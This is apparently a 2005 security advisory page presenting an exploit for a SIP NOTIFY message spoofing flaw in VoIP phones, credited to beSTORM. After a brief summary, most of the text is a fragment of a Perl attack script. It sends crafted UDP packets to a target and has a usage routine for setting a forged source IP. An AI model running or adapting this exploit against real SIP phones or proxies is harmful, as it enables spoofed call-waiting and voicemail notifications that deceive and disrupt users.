Notify Message Spoofing Vulnerability With VoIP Phones (Exploit)
11 Jul. 2005
Summary
As reported earlier, many SIP implementations do not perform proper Caller-ID checks. This allows an attacker to spoof various NOTIFY messages, such as call-waiting and voice-mail.
For more information see: Notify Message Spoofing Vulnerability With VoIP Phones
Credit:
The information has been provided by beSTORM.
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";
sub usage
{
if ($print_usage) { return; }
$print_usage = 1;
print ("#"x50);
print "\n";
print "# $0 [hostname] [repeater] [attackerip] [attackedip]\n";
print "# hostname\t-\tThe host the packet will be sent to.\n";
print "# repeater\t-\tThe number of times the character will be sent (repeated character $repeated_type).\n";
print "# attackerip\t-\tThe IP address from which the packet should be\n";
print "\t\t\taddressed from (doesn't have to be your IP address).\n";
print "# attackedip\t-\tThe IP address that you are contacting\n";
print "\t\t\t(doesn't have to be the hostname IP's address).\n";
print "\n";
print "Results may vary depending on how the remote host handles packets.\n";
print "For example:\n";
print " * Some SIP Proxies won't look into packets addressed to it (attackedip or attackerip).\n";
print " * Some SIP Routers won't handle packets that aren't addressed to it.\n";
print "etc\n";
print "\n";
}
